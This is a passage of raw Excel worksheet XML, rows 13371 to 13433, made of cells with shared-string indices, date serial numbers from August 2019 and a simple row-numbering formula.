      <c r="F13371" t="s">
        <v>9975</v>
      </c>
      <c r="G13371" t="s">
        <v>23691</v>
      </c>
    </row>
    <row r="13372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13372">
        <f t="shared" si="208"/>
        <v>13371</v>
      </c>
      <c r="B13372">
        <v>3371</v>
      </c>
      <c r="C13372" t="s">
        <v>19637</v>
      </c>
      <c r="D13372" s="1">
        <v>43695</v>
      </c>
      <c r="E13372" t="s">
        <v>23692</v>
      </c>
      <c r="F13372" t="s">
        <v>10021</v>
      </c>
      <c r="G13372" t="s">
        <v>23693</v>
      </c>
    </row>
    <row r="13373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13373">
        <f t="shared" si="208"/>
        <v>13372</v>
      </c>
      <c r="B13373">
        <v>3372</v>
      </c>
      <c r="C13373" t="s">
        <v>19637</v>
      </c>
      <c r="D13373" s="1">
        <v>43695</v>
      </c>
      <c r="F13373" t="s">
        <v>10526</v>
      </c>
      <c r="G13373" t="s">
        <v>23694</v>
      </c>
    </row>
    <row r="13374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13374">
        <f t="shared" si="208"/>
        <v>13373</v>
      </c>
      <c r="B13374">
        <v>3373</v>
      </c>
      <c r="C13374" t="s">
        <v>19637</v>
      </c>
      <c r="D13374" s="1">
        <v>43690</v>
      </c>
      <c r="E13374" t="s">
        <v>19701</v>
      </c>
      <c r="F13374" t="s">
        <v>10021</v>
      </c>
      <c r="G13374" t="s">
        <v>23695</v>
      </c>
    </row>
    <row r="13375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13375">
        <f t="shared" si="208"/>
        <v>13374</v>
      </c>
      <c r="B13375">
        <v>3374</v>
      </c>
      <c r="C13375" t="s">
        <v>19637</v>
      </c>
      <c r="D13375" s="1">
        <v>43700</v>
      </c>
      <c r="F13375" t="s">
        <v>10021</v>
      </c>
      <c r="G13375" t="s">
        <v>23696</v>
      </c>
    </row>
    <row r="13376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13376">
        <f t="shared" si="208"/>
        <v>13375</v>
      </c>
      <c r="B13376">
        <v>3375</v>
      </c>
      <c r="C13376" t="s">
        <v>19637</v>
      </c>
      <c r="D13376" s="1">
        <v>43686</v>
      </c>
      <c r="F13376" t="s">
        <v>10021</v>
      </c>
      <c r="G13376" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13377">
        <f t="shared" si="208"/>
        <v>13376</v>
      </c>
      <c r="B13377">
        <v>3376</v>
      </c>
      <c r="C13377" t="s">
        <v>19637</v>
      </c>
      <c r="D13377" s="1">
        <v>43700</v>
      </c>
      <c r="E13377" t="s">
        <v>19640</v>
      </c>
      <c r="F13377" t="s">
        <v>10526</v>
      </c>
      <c r="G13377" t="s">
        <v>23697</v>
      </c>
    </row>
    <row r="13378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13378">
        <f t="shared" si="208"/>
        <v>13377</v>
      </c>
      <c r="B13378">
        <v>3377</v>
      </c>
      <c r="C13378" t="s">
        <v>19637</v>
      </c>
      <c r="D13378" s="1">
        <v>43695</v>
      </c>
      <c r="E13378" t="s">
        <v>20228</v>
      </c>
      <c r="F13378" t="s">
        <v>10021</v>
      </c>
      <c r="G13378" t="s">
        <v>23698</v>
      </c>
    </row>
    <row r="13379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13379">
        <f t="shared" ref="A13379:A13442" si="209">+ROW(A13378)</f>
        <v>13378</v>
      </c>
      <c r="B13379">
        <v>3378</v>
      </c>
      <c r="C13379" t="s">
        <v>19637</v>
      </c>
      <c r="D13379" s="1">
        <v>43691</v>
      </c>
      <c r="E13379" t="s">
        <v>19840</v>
      </c>
      <c r="F13379" t="s">
        <v>10021</v>
      </c>
      <c r="G13379" t="s">
        <v>23699</v>
      </c>
    </row>
    <row r="13380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13380">
        <f t="shared" si="209"/>
        <v>13379</v>
      </c>
      <c r="B13380">
        <v>3379</v>
      </c>
      <c r="C13380" t="s">
        <v>19637</v>
      </c>
      <c r="D13380" s="1">
        <v>43706</v>
      </c>
      <c r="E13380" t="s">
        <v>22166</v>
      </c>
      <c r="F13380" t="s">
        <v>10526</v>
      </c>
      <c r="G13380" t="s">
        <v>23700</v>
      </c>
    </row>
    <row r="13381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13381">
        <f t="shared" si="209"/>
        <v>13380</v>
      </c>
      <c r="B13381">
        <v>3380</v>
      </c>
      <c r="C13381" t="s">
        <v>19637</v>
      </c>
      <c r="D13381" s="1">
        <v>43683</v>
      </c>
      <c r="E13381" t="s">
        <v>21389</v>
      </c>
      <c r="F13381" t="s">
        <v>9975</v>
      </c>
      <c r="G13381" t="s">
        <v>23701</v>
      </c>
    </row>
    <row r="13382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13382">
        <f t="shared" si="209"/>
        <v>13381</v>
      </c>
      <c r="B13382">
        <v>3381</v>
      </c>
      <c r="C13382" t="s">
        <v>19637</v>
      </c>
      <c r="D13382" s="1">
        <v>43696</v>
      </c>
      <c r="E13382" t="s">
        <v>19853</v>
      </c>
      <c r="F13382" t="s">
        <v>10526</v>
      </c>
      <c r="G13382" t="s">
        <v>23702</v>
      </c>
    </row>
    <row r="13383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13383">
        <f t="shared" si="209"/>
        <v>13382</v>
      </c>
      <c r="B13383">
        <v>3382</v>
      </c>
      <c r="C13383" t="s">
        <v>19637</v>
      </c>
      <c r="D13383" s="1">
        <v>43694</v>
      </c>
      <c r="E13383" t="s">
        <v>19640</v>
      </c>
      <c r="F13383" t="s">
        <v>9975</v>
      </c>
      <c r="G13383" t="s">
        <v>23703</v>
      </c>
    </row>
    <row r="13384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13384">
        <f t="shared" si="209"/>
        <v>13383</v>
      </c>
      <c r="B13384">
        <v>3383</v>
      </c>
      <c r="C13384" t="s">
        <v>19637</v>
      </c>
      <c r="D13384" s="1">
        <v>43704</v>
      </c>
      <c r="E13384" t="s">
        <v>19695</v>
      </c>
      <c r="F13384" t="s">
        <v>9975</v>
      </c>
      <c r="G13384" t="s">
        <v>23704</v>
      </c>
    </row>
    <row r="13385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13385">
        <f t="shared" si="209"/>
        <v>13384</v>
      </c>
      <c r="B13385">
        <v>3384</v>
      </c>
      <c r="C13385" t="s">
        <v>19637</v>
      </c>
      <c r="D13385" s="1">
        <v>43685</v>
      </c>
      <c r="E13385" t="s">
        <v>19650</v>
      </c>
      <c r="F13385" t="s">
        <v>10021</v>
      </c>
      <c r="G13385" t="s">
        <v>23705</v>
      </c>
    </row>
    <row r="13386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13386">
        <f t="shared" si="209"/>
        <v>13385</v>
      </c>
      <c r="B13386">
        <v>3385</v>
      </c>
      <c r="C13386" t="s">
        <v>19637</v>
      </c>
      <c r="D13386" s="1">
        <v>43695</v>
      </c>
      <c r="E13386" t="s">
        <v>23619</v>
      </c>
      <c r="F13386" t="s">
        <v>10526</v>
      </c>
      <c r="G13386" t="s">
        <v>23706</v>
      </c>
    </row>
    <row r="13387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13387">
        <f t="shared" si="209"/>
        <v>13386</v>
      </c>
      <c r="B13387">
        <v>3386</v>
      </c>
      <c r="C13387" t="s">
        <v>19637</v>
      </c>
      <c r="D13387" s="1">
        <v>43683</v>
      </c>
      <c r="E13387" t="s">
        <v>19796</v>
      </c>
      <c r="F13387" t="s">
        <v>10021</v>
      </c>
      <c r="G13387" t="s">
        <v>23707</v>
      </c>
    </row>
    <row r="13388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13388">
        <f t="shared" si="209"/>
        <v>13387</v>
      </c>
      <c r="B13388">
        <v>3387</v>
      </c>
      <c r="C13388" t="s">
        <v>19637</v>
      </c>
      <c r="D13388" s="1">
        <v>43686</v>
      </c>
      <c r="E13388" t="s">
        <v>20034</v>
      </c>
      <c r="F13388" t="s">
        <v>10021</v>
      </c>
      <c r="G13388" t="s">
        <v>23708</v>
      </c>
    </row>
    <row r="13389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13389">
        <f t="shared" si="209"/>
        <v>13388</v>
      </c>
      <c r="B13389">
        <v>3388</v>
      </c>
      <c r="C13389" t="s">
        <v>19637</v>
      </c>
      <c r="D13389" s="1">
        <v>43695</v>
      </c>
      <c r="E13389" t="s">
        <v>19717</v>
      </c>
      <c r="F13389" t="s">
        <v>10526</v>
      </c>
      <c r="G13389" t="s">
        <v>23709</v>
      </c>
    </row>
    <row r="13390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13390">
        <f t="shared" si="209"/>
        <v>13389</v>
      </c>
      <c r="B13390">
        <v>3389</v>
      </c>
      <c r="C13390" t="s">
        <v>19637</v>
      </c>
      <c r="D13390" s="1">
        <v>43702</v>
      </c>
      <c r="E13390" t="s">
        <v>19640</v>
      </c>
      <c r="F13390" t="s">
        <v>10021</v>
      </c>
      <c r="G13390" t="s">
        <v>23710</v>
      </c>
    </row>
    <row r="13391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13391">
        <f t="shared" si="209"/>
        <v>13390</v>
      </c>
      <c r="B13391">
        <v>3390</v>
      </c>
      <c r="C13391" t="s">
        <v>19637</v>
      </c>
      <c r="D13391" s="1">
        <v>43678</v>
      </c>
      <c r="E13391" t="s">
        <v>19743</v>
      </c>
      <c r="F13391" t="s">
        <v>10021</v>
      </c>
      <c r="G13391" t="s">
        <v>23711</v>
      </c>
    </row>
    <row r="13392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13392">
        <f t="shared" si="209"/>
        <v>13391</v>
      </c>
      <c r="B13392">
        <v>3391</v>
      </c>
      <c r="C13392" t="s">
        <v>19637</v>
      </c>
      <c r="D13392" s="1">
        <v>43701</v>
      </c>
      <c r="F13392" t="s">
        <v>10021</v>
      </c>
      <c r="G13392" t="s">
        <v>23712</v>
      </c>
    </row>
    <row r="13393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13393">
        <f t="shared" si="209"/>
        <v>13392</v>
      </c>
      <c r="B13393">
        <v>3392</v>
      </c>
      <c r="C13393" t="s">
        <v>19637</v>
      </c>
      <c r="D13393" s="1">
        <v>43704</v>
      </c>
      <c r="E13393" t="s">
        <v>23713</v>
      </c>
      <c r="F13393" t="s">
        <v>10526</v>
      </c>
      <c r="G13393" t="s">
        <v>23714</v>
      </c>
    </row>
    <row r="13394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13394">
        <f t="shared" si="209"/>
        <v>13393</v>
      </c>
      <c r="B13394">
        <v>3393</v>
      </c>
      <c r="C13394" t="s">
        <v>19637</v>
      </c>
      <c r="D13394" s="1">
        <v>43688</v>
      </c>
      <c r="F13394" t="s">
        <v>10526</v>
      </c>
      <c r="G13394" t="s">
        <v>23715</v>
      </c>
    </row>
    <row r="13395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13395">
        <f t="shared" si="209"/>
        <v>13394</v>
      </c>
      <c r="B13395">
        <v>3394</v>
      </c>
      <c r="C13395" t="s">
        <v>19637</v>
      </c>
      <c r="D13395" s="1">
        <v>43703</v>
      </c>
      <c r="F13395" t="s">
        <v>10021</v>
      </c>
      <c r="G13395" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13396">
        <f t="shared" si="209"/>
        <v>13395</v>
      </c>
      <c r="B13396">
        <v>3395</v>
      </c>
      <c r="C13396" t="s">
        <v>19637</v>
      </c>
      <c r="D13396" s="1">
        <v>43685</v>
      </c>
      <c r="E13396" t="s">
        <v>20169</v>
      </c>
      <c r="F13396" t="s">
        <v>10021</v>
      </c>
      <c r="G13396" t="s">
        <v>23716</v>
      </c>
    </row>
    <row r="13397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13397">
        <f t="shared" si="209"/>
        <v>13396</v>
      </c>
      <c r="B13397">
        <v>3396</v>
      </c>
      <c r="C13397" t="s">
        <v>19637</v>
      </c>
      <c r="D13397" s="1">
        <v>43686</v>
      </c>
      <c r="F13397" t="s">
        <v>9975</v>
      </c>
      <c r="G13397" t="s">
        <v>23717</v>
      </c>
    </row>
    <row r="13398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13398">
        <f t="shared" si="209"/>
        <v>13397</v>
      </c>
      <c r="B13398">
        <v>3397</v>
      </c>
      <c r="C13398" t="s">
        <v>19637</v>
      </c>
      <c r="D13398" s="1">
        <v>43704</v>
      </c>
      <c r="E13398" t="s">
        <v>21355</v>
      </c>
      <c r="F13398" t="s">
        <v>10526</v>
      </c>
      <c r="G13398" t="s">
        <v>23718</v>
      </c>
    </row>
    <row r="13399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13399">
        <f t="shared" si="209"/>
        <v>13398</v>
      </c>
      <c r="B13399">
        <v>3398</v>
      </c>
      <c r="C13399" t="s">
        <v>19637</v>
      </c>
      <c r="D13399" s="1">
        <v>43687</v>
      </c>
      <c r="E13399" t="s">
        <v>19680</v>
      </c>
      <c r="F13399" t="s">
        <v>10021</v>
      </c>
      <c r="G13399" t="s">
        <v>23719</v>
      </c>
    </row>
    <row r="13400" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13400">
        <f t="shared" si="209"/>
        <v>13399</v>
      </c>
      <c r="B13400">
        <v>3399</v>
      </c>
      <c r="C13400" t="s">
        <v>19637</v>
      </c>
      <c r="D13400" s="1">
        <v>43687</v>
      </c>
      <c r="E13400" t="s">
        <v>23720</v>
      </c>
      <c r="F13400" t="s">
        <v>10526</v>
      </c>
      <c r="G13400" t="s">
        <v>23721</v>
      </c>
    </row>
    <row r="13401" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13401">
        <f t="shared" si="209"/>
        <v>13400</v>
      </c>
      <c r="B13401">
        <v>3400</v>
      </c>
      <c r="C13401" t="s">
        <v>19637</v>
      </c>
      <c r="D13401" s="1">
        <v>43690</v>
      </c>
      <c r="E13401" t="s">
        <v>23722</v>
      </c>
      <c r="F13401" t="s">
        <v>9978</v>
      </c>
      <c r="G13401" t="s">
        <v>23723</v>
      </c>
    </row>
    <row r="13402" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13402">
        <f t="shared" si="209"/>
        <v>13401</v>
      </c>
      <c r="B13402">
        <v>3401</v>
      </c>
      <c r="C13402" t="s">
        <v>19637</v>
      </c>
      <c r="D13402" s="1">
        <v>43682</v>
      </c>
      <c r="E13402" t="s">
        <v>19640</v>
      </c>
      <c r="F13402" t="s">
        <v>9975</v>
      </c>
      <c r="G13402" t="s">
        <v>23724</v>
      </c>
    </row>
    <row r="13403" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13403">
        <f t="shared" si="209"/>
        <v>13402</v>
      </c>
      <c r="B13403">
        <v>3402</v>
      </c>
      <c r="C13403" t="s">
        <v>19637</v>
      </c>
      <c r="D13403" s="1">
        <v>43691</v>
      </c>
      <c r="E13403" t="s">
        <v>19676</v>
      </c>
      <c r="F13403" t="s">
        <v>10021</v>
      </c>
      <c r="G13403" t="s">
        <v>23725</v>
      </c>
    </row>
    <row r="13404" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13404">
        <f t="shared" si="209"/>
        <v>13403</v>
      </c>
      <c r="B13404">
        <v>3403</v>
      </c>
      <c r="C13404" t="s">
        <v>19637</v>
      </c>
      <c r="D13404" s="1">
        <v>43700</v>
      </c>
      <c r="E13404" t="s">
        <v>23726</v>
      </c>
      <c r="F13404" t="s">
        <v>9978</v>
      </c>
      <c r="G13404" t="s">
        <v>23727</v>
      </c>
    </row>
    <row r="13405" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13405">
        <f t="shared" si="209"/>
        <v>13404</v>
      </c>
      <c r="B13405">
        <v>3404</v>
      </c>
      <c r="C13405" t="s">
        <v>19637</v>
      </c>
      <c r="D13405" s="1">
        <v>43685</v>
      </c>
      <c r="E13405" t="s">
        <v>23728</v>
      </c>
      <c r="F13405" t="s">
        <v>10021</v>
      </c>
      <c r="G13405" t="s">
        <v>23729</v>
      </c>
    </row>
    <row r="13406" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13406">
        <f t="shared" si="209"/>
        <v>13405</v>
      </c>
      <c r="B13406">
        <v>3405</v>
      </c>
      <c r="C13406" t="s">
        <v>19637</v>
      </c>
      <c r="D13406" s="1">
        <v>43692</v>
      </c>
      <c r="E13406" t="s">
        <v>19655</v>
      </c>
      <c r="F13406" t="s">
        <v>9975</v>
      </c>
      <c r="G13406" t="s">
        <v>23730</v>
      </c>
    </row>
    <row r="13407" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13407">
        <f t="shared" si="209"/>
        <v>13406</v>
      </c>
      <c r="B13407">
        <v>3406</v>
      </c>
      <c r="C13407" t="s">
        <v>19637</v>
      </c>
      <c r="D13407" s="1">
        <v>43694</v>
      </c>
      <c r="E13407" t="s">
        <v>20220</v>
      </c>
      <c r="F13407" t="s">
        <v>10021</v>
      </c>
      <c r="G13407" t="s">
        <v>23731</v>
      </c>
    </row>
    <row r="13408" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13408">
        <f t="shared" si="209"/>
        <v>13407</v>
      </c>
      <c r="B13408">
        <v>3407</v>
      </c>
      <c r="C13408" t="s">
        <v>19637</v>
      </c>
      <c r="D13408" s="1">
        <v>43690</v>
      </c>
      <c r="E13408" t="s">
        <v>19725</v>
      </c>
      <c r="F13408" t="s">
        <v>9978</v>
      </c>
      <c r="G13408" t="s">
        <v>23732</v>
      </c>
    </row>
    <row r="13409" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13409">
        <f t="shared" si="209"/>
        <v>13408</v>
      </c>
      <c r="B13409">
        <v>3408</v>
      </c>
      <c r="C13409" t="s">
        <v>19637</v>
      </c>
      <c r="D13409" s="1">
        <v>43685</v>
      </c>
      <c r="E13409" t="s">
        <v>12781</v>
      </c>
      <c r="F13409" t="s">
        <v>9975</v>
      </c>
      <c r="G13409" t="s">
        <v>23733</v>
      </c>
    </row>
    <row r="13410" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13410">
        <f t="shared" si="209"/>
        <v>13409</v>
      </c>
      <c r="B13410">
        <v>3409</v>
      </c>
      <c r="C13410" t="s">
        <v>19637</v>
      </c>
      <c r="D13410" s="1">
        <v>43683</v>
      </c>
      <c r="F13410" t="s">
        <v>10526</v>
      </c>
      <c r="G13410" t="s">
        <v>23734</v>
      </c>
    </row>
    <row r="13411" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13411">
        <f t="shared" si="209"/>
        <v>13410</v>
      </c>
      <c r="B13411">
        <v>3410</v>
      </c>
      <c r="C13411" t="s">
        <v>19637</v>
      </c>
      <c r="D13411" s="1">
        <v>43691</v>
      </c>
      <c r="F13411" t="s">
        <v>10526</v>
      </c>
      <c r="G13411" t="s">
        <v>23735</v>
      </c>
    </row>
    <row r="13412" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13412">
        <f t="shared" si="209"/>
        <v>13411</v>
      </c>
      <c r="B13412">
        <v>3411</v>
      </c>
      <c r="C13412" t="s">
        <v>19637</v>
      </c>
      <c r="D13412" s="1">
        <v>43682</v>
      </c>
      <c r="F13412" t="s">
        <v>10526</v>
      </c>
      <c r="G13412" t="s">
        <v>23736</v>
      </c>
    </row>
    <row r="13413" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13413">
        <f t="shared" si="209"/>
        <v>13412</v>
      </c>
      <c r="B13413">
        <v>3412</v>
      </c>
      <c r="C13413" t="s">
        <v>19637</v>
      </c>
      <c r="D13413" s="1">
        <v>43682</v>
      </c>
      <c r="E13413" t="s">
        <v>19640</v>
      </c>
      <c r="F13413" t="s">
        <v>9975</v>
      </c>
      <c r="G13413" t="s">
        <v>23737</v>
      </c>
    </row>
    <row r="13414" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13414">
        <f t="shared" si="209"/>
        <v>13413</v>
      </c>
      <c r="B13414">
        <v>3413</v>
      </c>
      <c r="C13414" t="s">
        <v>19637</v>
      </c>
      <c r="D13414" s="1">
        <v>43692</v>
      </c>
      <c r="F13414" t="s">
        <v>10021</v>
      </c>
      <c r="G13414" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13415" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13415">
        <f t="shared" si="209"/>
        <v>13414</v>
      </c>
      <c r="B13415">
        <v>3414</v>
      </c>
      <c r="C13415" t="s">
        <v>19637</v>
      </c>
      <c r="D13415" s="1">
        <v>43685</v>
      </c>
      <c r="F13415" t="s">
        <v>9975</v>
      </c>
      <c r="G13415" t="s">
        <v>23738</v>
      </c>
    </row>
    <row r="13416" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13416">
        <f t="shared" si="209"/>
        <v>13415</v>
      </c>
      <c r="B13416">
        <v>3415</v>
      </c>
      <c r="C13416" t="s">
        <v>19637</v>
      </c>
      <c r="D13416" s="1">
        <v>43687</v>
      </c>
      <c r="E13416" t="s">
        <v>20187</v>
      </c>
      <c r="F13416" t="s">
        <v>9975</v>
      </c>
      <c r="G13416" t="s">
        <v>23739</v>
      </c>
    </row>
    <row r="13417" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13417">
        <f t="shared" si="209"/>
        <v>13416</v>
      </c>
      <c r="B13417">
        <v>3416</v>
      </c>
      <c r="C13417" t="s">
        <v>19637</v>
      </c>
      <c r="D13417" s="1">
        <v>43683</v>
      </c>
      <c r="F13417" t="s">
        <v>10526</v>
      </c>
      <c r="G13417" t="s">
        <v>23740</v>
      </c>
    </row>
    <row r="13418" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13418">
        <f t="shared" si="209"/>
        <v>13417</v>
      </c>
      <c r="B13418">
        <v>3417</v>
      </c>
      <c r="C13418" t="s">
        <v>19637</v>
      </c>
      <c r="D13418" s="1">
        <v>43680</v>
      </c>
      <c r="E13418" t="s">
        <v>19640</v>
      </c>
      <c r="F13418" t="s">
        <v>10021</v>
      </c>
      <c r="G13418" t="s">
        <v>23741</v>
      </c>
    </row>
    <row r="13419" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13419">
        <f t="shared" si="209"/>
        <v>13418</v>
      </c>
      <c r="B13419">
        <v>3418</v>
      </c>
      <c r="C13419" t="s">
        <v>19637</v>
      </c>
      <c r="D13419" s="1">
        <v>43679</v>
      </c>
      <c r="E13419" t="s">
        <v>21789</v>
      </c>
      <c r="F13419" t="s">
        <v>10021</v>
      </c>
      <c r="G13419" t="s">
        <v>23742</v>
      </c>
    </row>
    <row r="13420" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13420">
        <f t="shared" si="209"/>
        <v>13419</v>
      </c>
      <c r="B13420">
        <v>3419</v>
      </c>
      <c r="C13420" t="s">
        <v>19637</v>
      </c>
      <c r="D13420" s="1">
        <v>43701</v>
      </c>
      <c r="E13420" t="s">
        <v>19750</v>
      </c>
      <c r="F13420" t="s">
        <v>9978</v>
      </c>
      <c r="G13420" t="s">
        <v>23743</v>
      </c>
    </row>
    <row r="13421" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13421">
        <f t="shared" si="209"/>
        <v>13420</v>
      </c>
      <c r="B13421">
        <v>3420</v>
      </c>
      <c r="C13421" t="s">
        <v>19637</v>
      </c>
      <c r="D13421" s="1">
        <v>43683</v>
      </c>
      <c r="F13421" t="s">
        <v>9978</v>
      </c>
      <c r="G13421" t="s">
        <v>23744</v>
      </c>
    </row>
    <row r="13422" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13422">
        <f t="shared" si="209"/>
        <v>13421</v>
      </c>
      <c r="B13422">
        <v>3421</v>
      </c>
      <c r="C13422" t="s">
        <v>19637</v>
      </c>
      <c r="D13422" s="1">
        <v>43688</v>
      </c>
      <c r="E13422" t="s">
        <v>19645</v>
      </c>
      <c r="F13422" t="s">
        <v>9975</v>
      </c>
      <c r="G13422" t="s">
        <v>23745</v>
      </c>
    </row>
    <row r="13423" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13423">
        <f t="shared" si="209"/>
        <v>13422</v>
      </c>
      <c r="B13423">
        <v>3422</v>
      </c>
      <c r="C13423" t="s">
        <v>19637</v>
      </c>
      <c r="D13423" s="1">
        <v>43705</v>
      </c>
      <c r="F13423" t="s">
        <v>10021</v>
      </c>
      <c r="G13423" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13424" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13424">
        <f t="shared" si="209"/>
        <v>13423</v>
      </c>
      <c r="B13424">
        <v>3423</v>
      </c>
      <c r="C13424" t="s">
        <v>19637</v>
      </c>
      <c r="D13424" s="1">
        <v>43694</v>
      </c>
      <c r="E13424" t="s">
        <v>19640</v>
      </c>
      <c r="F13424" t="s">
        <v>10021</v>
      </c>
      <c r="G13424" t="s">
        <v>23746</v>
      </c>
    </row>
    <row r="13425" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13425">
        <f t="shared" si="209"/>
        <v>13424</v>
      </c>
      <c r="B13425">
        <v>3424</v>
      </c>
      <c r="C13425" t="s">
        <v>19637</v>
      </c>
      <c r="D13425" s="1">
        <v>43694</v>
      </c>
      <c r="E13425" t="s">
        <v>19640</v>
      </c>
      <c r="F13425" t="s">
        <v>10526</v>
      </c>
      <c r="G13425" t="s">
        <v>23747</v>
      </c>
    </row>
    <row r="13426" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13426">
        <f t="shared" si="209"/>
        <v>13425</v>
      </c>
      <c r="B13426">
        <v>3425</v>
      </c>
      <c r="C13426" t="s">
        <v>19637</v>
      </c>
      <c r="D13426" s="1">
        <v>43678</v>
      </c>
      <c r="E13426" t="s">
        <v>23748</v>
      </c>
      <c r="F13426" t="s">
        <v>10021</v>
      </c>
      <c r="G13426" t="s">
        <v>23749</v>
      </c>
    </row>
    <row r="13427" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13427">
        <f t="shared" si="209"/>
        <v>13426</v>
      </c>
      <c r="B13427">
        <v>3426</v>
      </c>
      <c r="C13427" t="s">
        <v>19637</v>
      </c>
      <c r="D13427" s="1">
        <v>43695</v>
      </c>
      <c r="E13427" t="s">
        <v>19687</v>
      </c>
      <c r="F13427" t="s">
        <v>10021</v>
      </c>
      <c r="G13427" t="s">
        <v>23750</v>
      </c>
    </row>
    <row r="13428" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13428">
        <f t="shared" si="209"/>
        <v>13427</v>
      </c>
      <c r="B13428">
        <v>3427</v>
      </c>
      <c r="C13428" t="s">
        <v>19637</v>
      </c>
      <c r="D13428" s="1">
        <v>43692</v>
      </c>
      <c r="E13428" t="s">
        <v>19648</v>
      </c>
      <c r="F13428" t="s">
        <v>10021</v>
      </c>
      <c r="G13428" t="s">
        <v>23751</v>
      </c>
    </row>
    <row r="13429" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13429">
        <f t="shared" si="209"/>
        <v>13428</v>
      </c>
      <c r="B13429">
        <v>3428</v>
      </c>
      <c r="C13429" t="s">
        <v>19637</v>
      </c>
      <c r="D13429" s="1">
        <v>43690</v>
      </c>
      <c r="E13429" t="s">
        <v>19638</v>
      </c>
      <c r="F13429" t="s">
        <v>10021</v>
      </c>
      <c r="G13429" t="s">
        <v>23752</v>
      </c>
    </row>
    <row r="13430" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13430">
        <f t="shared" si="209"/>
        <v>13429</v>
      </c>
      <c r="B13430">
        <v>3429</v>
      </c>
      <c r="C13430" t="s">
        <v>19637</v>
      </c>
      <c r="D13430" s="1">
        <v>43682</v>
      </c>
      <c r="E13430" t="s">
        <v>21415</v>
      </c>
      <c r="F13430" t="s">
        <v>10021</v>
      </c>
      <c r="G13430" t="s">
        <v>23753</v>
      </c>
    </row>
    <row r="13431" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13431">
        <f t="shared" si="209"/>
        <v>13430</v>
      </c>
      <c r="B13431">
        <v>3430</v>
      </c>
      <c r="C13431" t="s">
        <v>19637</v>
      </c>
      <c r="D13431" s="1">
        <v>43705</v>
      </c>
      <c r="E13431" t="s">
        <v>19750</v>
      </c>
      <c r="F13431" t="s">
        <v>9978</v>
      </c>
      <c r="G13431" t="s">
        <v>23754</v>
      </c>
    </row>
    <row r="13432" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13432">
        <f t="shared" si="209"/>
        <v>13431</v>
      </c>
      <c r="B13432">
        <v>3431</v>
      </c>
      <c r="C13432" t="s">
        <v>19637</v>
      </c>
      <c r="D13432" s="1">
        <v>43698</v>
      </c>
      <c r="E13432" t="s">
        <v>22330</v>
      </c>
      <c r="F13432" t="s">
        <v>10526</v>
      </c>
      <c r="G13432" t="s">
        <v>23755</v>
      </c>
    </row>
    <row r="13433" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13433">
        <f t="shared" si="209"/>
        <v>13432</v>
      </c>
      <c r="B13433">
        <v>3432</v>
      </c>
      <c r="C13433" t="s">
        <v>19637</v>
      </c>
      <c r="D13433" s="1">
        <v>43683</v>
      </c>
      <c r="E13433" t="s">
        <v>20322</v>
      </c>
      <c r="F13433" t="s">
        <v>10526</v>
      </c>
      <c r="G13433" t="s">
        <v>20249</v>
      </c>
    </row>
    <row r="13434" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13434">
        <f t="shared" si="209"/>
        <v>13433</v>
      </c>
      <c r="B13434">
        <v>3433</v>
      </c>
